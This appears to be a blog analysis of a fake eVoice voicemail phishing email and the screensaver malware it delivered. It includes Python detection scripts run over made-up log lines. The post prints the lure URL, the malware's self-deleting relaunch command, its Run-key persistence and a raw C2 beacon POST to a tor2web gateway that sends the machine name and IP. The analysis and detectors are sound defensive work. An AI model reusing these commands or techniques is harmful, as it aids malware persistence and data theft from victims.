“eVoice Voicemail (Callback: 379-433-5389)” Virus e-mail

I received an e-mail at an address I believe was leaked by LogMeIn or DynDNS…

Titled “eVoice Voicemail (Callback: 379-433-5389)”


Received: from PTYAMOPS (Unknown []) by my.mailserver.here
with ESMTP ; Tue, 13 Jan 2015 15:58:39 +0000
Message-ID: <DGF037F4.6700866@readsoft.com>
Date: Tue, 13 Jan 2015 16:59:31 +0200
From: 379-433-5389 <messages@evoice.com>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Thunderbird/24.2.0
MIME-Version: 1.0
To: <me@address.refacted>
Subject: eVoice Voicemail (Callback: 379-433-5389)
Content-Type: text/html; charset="ISO-8859-1"
Content-Transfer-Encoding: 7bit
Return-Path: asphyxiates38@readsoft.com

eVoice – A Better Way to Connect <http://a248.e.akamai.net/f/248/528/1d/home.evoice.com/evoice_em_assets/evoice_logo_main.png>

Voicemail Transcription

This message could not be transcribed
Click To Listen Voice Message

Message Details


Tue, 13 Jan 2015 16:59:31 +0200




53 seconds
Want Better Transcriptions?
Upgrade your voice-to-text plan and get better quality message transcriptions. Upgrades available by calling Support at 866-761-8108. <http://baliklikaplica.com/wp-content/plugins/akossmett/_inc/img/1.php>
J2 Global – Cloud Services for Business <http://www.j2.com>

© 2014 j2 Cloud Services, Inc. All rights reserved. eVoice is a registered trademark of j2 Cloud Services, Inc.

Clicking the link lands on a page with a JavaScript download trigger and a redirect to efax.com or similar.
In my case it served me “wav_voice01829479-20150113.zip”, which contained “wav_voice01829479-20150113.scr” – VirusTotal Report / Malwr Report
SHA256: c991923abacc9b18b0043bb0d71eb5b15558cf7a94cf6e6debdb0464660eea38


When the .scr is run it waits a few seconds, writes a copy of itself, launches a command prompt and then exits. The command prompt runs:

cmd /D /R ping -n 10 localhost && del "C:\Users\derp\Desktop\wav_voice01829479-20150113.scr" && start /B "" "C:\Users\derp\AppData\Roaming\Windows\winlogin.exe" && exit

The ping to localhost is a crude ten-second sleep that gives the original process time to exit; del then removes the file the user launched, and start /B runs the copy from AppData\Roaming\Windows\winlogin.exe (one letter off the legitimate winlogon.exe). The malware also adds itself to the user's Run key, HKCU\Software\Microsoft\Windows\CurrentVersion\Run (and possibly the HKLM equivalent, if it is running as an administrator).
It then immediately queries https://api.ipify.org to learn the infected system's public IP address.
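That command line is a recognisable pattern on its own: a ping to localhost used as a sleep, deletion of the file the user launched, and a start of a copy under AppData\Roaming whose name is one letter away from a Windows system binary, followed by a Run-key write pointing at that copy. Below is an added example, not the author's code, in Python that runs those checks over a few constructed Sysmon-style process-creation (EventID 1) and registry-set (EventID 13) lines modelled on this behaviour. The field layout, user name, SID and the benign lines are made up, and the list of system binary names to compare against is an assumption.

```python
import re
from difflib import get_close_matches
from ntpath import basename

# Constructed Sysmon-style event lines modelled on the behaviour described
# above. User name, SID, the benign vendor entries and the layout are made up.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Users\derp\Desktop\wav_voice01829479-20150113.scr CommandLine="C:\Users\derp\Desktop\wav_voice01829479-20150113.scr"',
    r'EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd /D /R ping -n 10 localhost && del "C:\Users\derp\Desktop\wav_voice01829479-20150113.scr" && start /B "" "C:\Users\derp\AppData\Roaming\Windows\winlogin.exe" && exit',
    r'EventID=13 Image=C:\Users\derp\AppData\Roaming\Windows\winlogin.exe TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\winlogin Details=C:\Users\derp\AppData\Roaming\Windows\winlogin.exe',
    r'EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c ping -n 4 8.8.8.8',
    r'EventID=13 Image=C:\Program Files\Vendor\setup.exe TargetObject=HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray Details="C:\Program Files\Vendor\tray.exe"',
]

FIELDS = ("EventID", "Image", "CommandLine", "TargetObject", "Details")
# Legitimate Windows binary names that malware likes to imitate (assumed list).
SYSTEM_NAMES = ["winlogon.exe", "svchost.exe", "csrss.exe", "lsass.exe", "explorer.exe"]
# Path fragments a normal user can write to; a Run-key target here is suspicious.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\", "\\users\\public\\")

# ping -n N localhost ... && del ... && start ...  (sleep, self-delete, relaunch)
SELF_DELETE = re.compile(
    r"ping\s+-n\s+\d+\s+(?:localhost|127\.0\.0\.1).*?&&\s*del\b.*?&&\s*start\b", re.I)
# start [/B] "" "C:\path\to\target.exe"
START_TARGET = re.compile(r'start\s+(?:/\w+\s+)*""\s+"([^"]+)"', re.I)


def parse_event(line: str) -> dict:
    """Split 'Key=value Key=value' into a dict; values may contain spaces."""
    parts = re.split(r"\s+(?=(?:%s)=)" % "|".join(FIELDS), line.strip())
    event = {}
    for part in parts:
        key, _, value = part.partition("=")
        event[key] = value.strip().strip('"')
    return event


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def lookalike(path: str):
    """Return the system binary this file name imitates, or None.

    An exact or near-exact match counts only when the file does not live
    under C:\\Windows, where the real binary would be.
    """
    name = basename(path).lower()
    hit = get_close_matches(name, SYSTEM_NAMES, n=1, cutoff=0.85)
    if hit and not path.lower().startswith("c:\\windows\\"):
        return hit[0]
    return None


def detect(lines) -> list:
    """Return (rule, detail) tuples for every suspicious event in lines."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "1":
            cmd = ev.get("CommandLine", "")
            if SELF_DELETE.search(cmd):
                findings.append(("self_delete_relaunch", cmd))
                m = START_TARGET.search(cmd)
                if m and in_user_writable(m.group(1)):
                    findings.append(("relaunch_from_user_dir", m.group(1)))
                if m and lookalike(m.group(1)):
                    findings.append(("lookalike_name",
                                     f"{basename(m.group(1))} ~ {lookalike(m.group(1))}"))
        elif ev.get("EventID") == "13":
            key = ev.get("TargetObject", "")
            value = ev.get("Details", "")
            if "\\currentversion\\run\\" in key.lower() and in_user_writable(value):
                findings.append(("run_key_user_dir", f"{key} -> {value}"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The benign lines (a plain ping to 8.8.8.8, and a vendor Run entry under Program Files written by an installer) produce nothing; the four findings all come from the two events that reproduce the chain above. In a real deployment the same logic maps directly onto a Sysmon or EDR query, and the Run-key rule is the one that keeps paying off after the dropper is long gone.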

The C2 server is a Tor hidden service, contacted through the tor2web.org gateway (https://ho7rcj6wucosa5bu.tor2web.org/gate.php). At the time of writing the request fails because Tor2web has blocked the whole hidden service, as the 403 below shows:

POST /gate.php HTTP/1.1
Cookie: disclaimer_accepted=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Host: ho7rcj6wucosa5bu.tor2web.org
Content-Length: 128
Cache-Control: no-cache

{108B7599-0406-4B26-AE7D-FD738CD4C09B}SERV }W7VM1 }my.ip.address.here

HTTP/1.1 403 Forbidden
Content-Length: 1190
Strict-Transport-Security: max-age=31536000
Content-Type: text/html
Cache-Control: no-cache

<title>Tor2web Error: Access Denied to Entire Hidden Service</title>
<meta content="text/html;charset=utf-8" http-equiv="content-type" />
<meta content="en" http-equiv="content-language" />
<meta content="noindex" name="robots" />
<script src="/antanistaticmap/tor2web.js" type="text/javascript"></script>
<link href="/antanistaticmap/tor2web.css" type="text/css" rel="stylesheet" />
<div id="tor2web">
<div id="header">
<h1><a href="https://www.tor2web.org"><img src="/antanistaticmap/tor2web.png" alt="tor2web logo" /></a></h1>
<div id="tor2web-content">
<h2 id="tor2web-title">Tor2web Error: Access Denied to Entire Hidden Service</h2>
<p>Access to this Hidden Service has been completely blocked</p><br />
<p>It may happen that Tor2web maintainers have to block proxy access to certain explicit illegal contents in order to keep the network up and running. In such case you can still access the content directly by using Tor, that's because Tor2web just acts as a proxy server and the content is on a Tor Hidden Service.</p>
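On the network side the infection is two short observations per host: an external-IP lookup to api.ipify.org, followed within seconds by a POST to a 16-character base32 label under tor2web.org, which is a v2 onion address being proxied to the clearnet. The 403 only means Tor2web refused to relay it; the infected host still made the attempt. The Python below is an added example, not from the post: it correlates those two events per source address over constructed proxy log lines (the line format, timestamps and internal addresses are made up, and the gateway suffix list holds only tor2web.org because that is all the page shows).

```python
import re
from datetime import datetime

# Assumed list of Tor-to-clearnet gateway suffixes; the page only shows tor2web.org.
TOR_GATEWAY_SUFFIXES = ("tor2web.org",)
# A 16-character base32 label in front of a gateway suffix is a v2 onion address.
ONION_V2 = re.compile(
    r"^([a-z2-7]{16})\.(?:%s)$" % "|".join(re.escape(s) for s in TOR_GATEWAY_SUFFIXES), re.I)
# External-IP lookup services (assumption: extend with whatever your proxy sees).
IP_LOOKUP_HOSTS = {"api.ipify.org"}
# How close the lookup and the gateway contact must be to count as one beacon.
BEACON_WINDOW_S = 60

# Constructed proxy log lines: time src method host path status.
# Made up, modelled on the traffic described above; not a real capture.
SAMPLE_LOG = """\
2015-01-13T15:59:02Z 10.0.0.5 GET api.ipify.org / 200
2015-01-13T15:59:03Z 10.0.0.5 POST ho7rcj6wucosa5bu.tor2web.org /gate.php 403
2015-01-13T15:59:10Z 10.0.0.7 GET www.j2.com / 200
2015-01-13T16:20:00Z 10.0.0.9 GET api.ipify.org / 200
2015-01-13T16:30:00Z 10.0.0.11 GET abcdefghijklmnop.tor2web.org /index.html 200
"""


def parse_log(text: str):
    """Yield one dict per log line; assumes the six-column layout above."""
    for line in text.splitlines():
        ts, src, method, host, path, status = line.split()
        yield {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src,
               "method": method, "host": host.lower(), "path": path, "status": status}


def detect_beacons(text: str) -> list:
    """Return (rule, src, detail) tuples.

    A gateway contact shortly after an external-IP lookup from the same
    source is reported as a C2 beacon; a gateway contact on its own is
    reported at lower confidence, and lookups are listed so the analyst can
    see which hosts are checking their public address.
    """
    findings = []
    last_ip_lookup = {}  # src -> time of its most recent external-IP lookup
    for ev in parse_log(text):
        if ev["host"] in IP_LOOKUP_HOSTS:
            last_ip_lookup[ev["src"]] = ev["ts"]
            findings.append(("external_ip_lookup", ev["src"], ev["host"]))
            continue
        m = ONION_V2.match(ev["host"])
        if not m:
            continue
        onion = m.group(1) + ".onion"
        prev = last_ip_lookup.get(ev["src"])
        if prev and (ev["ts"] - prev).total_seconds() <= BEACON_WINDOW_S:
            findings.append(("c2_beacon_after_ip_lookup", ev["src"], onion))
        else:
            findings.append(("tor_gateway_contact", ev["src"], onion))
    return findings


if __name__ == "__main__":
    for rule, src, detail in detect_beacons(SAMPLE_LOG):
        print(f"{rule}: {src} -> {detail}")
```

Note that the HTTP status is deliberately ignored: the 403 above is the gateway's decision, not the client's, and the same host would happily have beaconed had the service not been blocked. Blocking the gateway domains at the proxy stops this particular sample, but the finding you want to act on is the host that tried.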
